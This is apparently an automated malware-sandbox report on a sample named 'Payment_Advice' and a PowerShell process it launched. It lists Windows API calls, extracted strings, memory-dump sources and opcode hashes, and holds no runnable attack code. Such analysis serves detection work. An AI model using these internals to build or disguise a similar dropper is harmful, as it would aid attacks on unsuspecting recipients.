CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23

Strings

: Completed, xrefs: 00405DB8

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9

Function 00405933 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405939
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405943
lstrcatW.KERNEL32(?,00409014), ref: 00405955

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405933

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 0040381D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037F4,75923420,0040361F,?), ref: 00403837
GlobalFree.KERNEL32(?), ref: 0040383E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED

Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405985
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405995

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Analysis Process: powershell.exePID: 5884, Parent PID: 1680COMMON

Executed Functions

Function 0799C4D6 Relevance: 64.3, Strings: 50, Instructions: 1844COMMON

Download Yara Rule

Strings

(ful, xrefs: 0799CB41
(ful, xrefs: 0799C30D
4']q, xrefs: 0799C11A
4rl, xrefs: 0799D7D4
-fk, xrefs: 0799D21D
(ful, xrefs: 0799C8DE
(ful, xrefs: 0799CAF0
(ful, xrefs: 0799CBDD
(ful, xrefs: 0799CC78
(ful, xrefs: 0799C757
4']q, xrefs: 0799CEBC
(ful, xrefs: 0799D79C
4']q, xrefs: 0799D981
(ful, xrefs: 0799D894
(ful, xrefs: 0799E024
(ful, xrefs: 0799D058
(ful, xrefs: 0799BF11
tLgk, xrefs: 0799BEF1
(ful, xrefs: 0799C870
tLgk, xrefs: 0799D8FA
(ful, xrefs: 0799DA9C
(ful, xrefs: 0799DD98
tLgk, xrefs: 0799C503
(ful, xrefs: 0799C5B0
x.fk, xrefs: 0799D1CC
(ful, xrefs: 0799D8AA
(ful, xrefs: 0799BFE1
(ful, xrefs: 0799C93D
x.fk, xrefs: 0799DEB5
tLgk, xrefs: 0799C984
(ful, xrefs: 0799DA8C
(ful, xrefs: 0799DC3C
(ful, xrefs: 0799D786
(ful, xrefs: 0799CCD6
4']q, xrefs: 0799CEB0
(ful, xrefs: 0799C9A6
4rl, xrefs: 0799D7EA
x.fk, xrefs: 0799C3F1
tLgk, xrefs: 0799C590
(ful, xrefs: 0799E00E
(ful, xrefs: 0799CF67
(ful, xrefs: 0799C6C9
tLgk, xrefs: 0799BDFB
(ful, xrefs: 0799CFFD
(ful, xrefs: 0799BE1B
(ful, xrefs: 0799DC26
(ful, xrefs: 0799DDAE
-fk, xrefs: 0799C43F
(ful, xrefs: 0799C2A7
4']q, xrefs: 0799C1BE

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$4']q$4']q$4']q$4']q$4rl$4rl$tLgk$tLgk$tLgk$tLgk$tLgk$tLgk$x.fk$x.fk$x.fk$-fk$-fk
API String ID: 0-2309420713
Opcode ID: 946eac18a832f2224cfcdf329bc11890c3836e66adf64ed290d38574e5c2e4ed
Instruction ID: badf294e95332d583a7a40aa57b60ac14a5a91c7d35586e95eeba6de069047f5
Opcode Fuzzy Hash: 946eac18a832f2224cfcdf329bc11890c3836e66adf64ed290d38574e5c2e4ed
Instruction Fuzzy Hash: B30362B4A00214DFEB64DB68C990BEAB7B6FF49304F1084A9D9096B741DB71EE81CF51

Function 04E5EAD8 Relevance: 2.8, Strings: 2, Instructions: 281COMMON

Download Yara Rule

Strings

/ y, xrefs: 04E5EB17
/ y, xrefs: 04E5EAF7

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID: / y$/ y
API String ID: 0-3043203095
Opcode ID: 14a90e910d45a592aafee672e8773d44848f8a088528eb5dfe6c27db01728208
Instruction ID: d1fa1a5aacb2975aede770839e97cf4b8797db5d8e8d7ba8f8e7c12371c22c75
Opcode Fuzzy Hash: 14a90e910d45a592aafee672e8773d44848f8a088528eb5dfe6c27db01728208
Instruction Fuzzy Hash: 85B16F71E00259DFDF14CFADC9857DDBBF2AF88308F149529E815A7264EB34A941CB81

Function 04E5F3A8 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

/ y, xrefs: 04E5F3C7
/ y, xrefs: 04E5F3E7

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID: / y$/ y
API String ID: 0-3043203095
Opcode ID: 1a504a7bbe16e64cf9f49fd8ddb47011ccbaab17170f5d45b782ad0a70351fcd
Instruction ID: c0e4d136c933333e0797ef3814fbcccbaa3a84630567076a23ad77fa4a6e7297
Opcode Fuzzy Hash: 1a504a7bbe16e64cf9f49fd8ddb47011ccbaab17170f5d45b782ad0a70351fcd
Instruction Fuzzy Hash: 0AB16F70E00209DFDF14CFA9D9857DDBBF2AF88318F149529D819EB264EB74A841CB85

Function 04E577F9 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f03142df27fde9d9c1ff587d9c31a50727cf57b363151a67d295aac2dd18f37
Instruction ID: 8ee0323d577e5f9c4987ef6d87b8de4e8e2a90bd3eafb234662b8b215ce55487
Opcode Fuzzy Hash: 6f03142df27fde9d9c1ff587d9c31a50727cf57b363151a67d295aac2dd18f37
Instruction Fuzzy Hash: AC419035B002148FDB19DB74C858AAD7BB2EF8D354F045468E806EB7A1DB34AC41CBA0

